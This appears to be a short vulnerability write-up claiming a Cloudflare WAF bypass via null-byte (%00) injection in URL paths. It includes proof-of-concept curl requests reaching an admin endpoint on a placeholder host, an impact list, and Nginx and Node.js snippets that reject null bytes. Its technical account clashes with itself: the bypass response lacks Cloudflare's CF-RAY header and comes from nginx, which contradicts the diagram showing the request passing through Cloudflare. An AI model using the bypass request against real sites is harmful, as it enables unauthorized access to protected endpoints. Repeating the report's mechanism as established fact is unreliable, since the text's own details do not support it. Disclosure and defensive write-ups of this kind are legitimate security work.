Cloudflare WAF Bypass via Null Byte Injection

Summary

The infrastructure protecting the API was vulnerable to a WAF bypass technique using Null Byte injection (%00) in the URL path. Cloudflare failed to correctly normalize requests containing this character.

Vulnerability Details

The vulnerability stemmed from a Parser Differential between the WAF and the backend:

┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attacker   │────▶│ Cloudflare  │────▶│   Backend   │
│             │     │   (C-based) │     │  (Node.js)  │
└─────────────┘     └─────────────┘     └─────────────┘
                           │                    │
                    Sees: "/api"         Sees: "/api/admin"
                    Result: PASS         Result: PROCESS

Technical Explanation

• WAF Parser (C-based): Treats %00 as string terminator
• Backend (Node.js): Processes full string including null byte

Proof of Concept

Administrative endpoints protected by WAF rules (returning 403) could be accessed:

# Normal request - blocked by WAF
curl -i "https://target.com/api/admin/settings"
# Response: 403 Forbidden (CF-RAY: abc123)

# Bypass request - null byte injection
curl -i "https://target.com/api%00/admin/settings"
# Response: 200 OK (No CF-RAY header - bypassed!)

Detection Method

Header	Normal Request	Bypass Request
CF-RAY	Present	Missing
Server	cloudflare	nginx
Status	403	200

Impact

This bypass renders all WAF-based protections ineffective:

• ❌ SQLi/XSS filtering bypassed
• ❌ Rate limiting bypassed
• ❌ IP blocking bypassed
• ❌ Bot protection bypassed

Additionally exposes the application to massive DoS attacks directly hitting the origin server.

Remediation

# Nginx - block null bytes at origin
if ($request_uri ~* "%00") {
    return 400;
}

// Node.js middleware
app.use((req, res, next) => {
  if (req.url.includes('%00') || req.url.includes('\x00')) {
    return res.status(400).send('Invalid request');
  }
  next();
});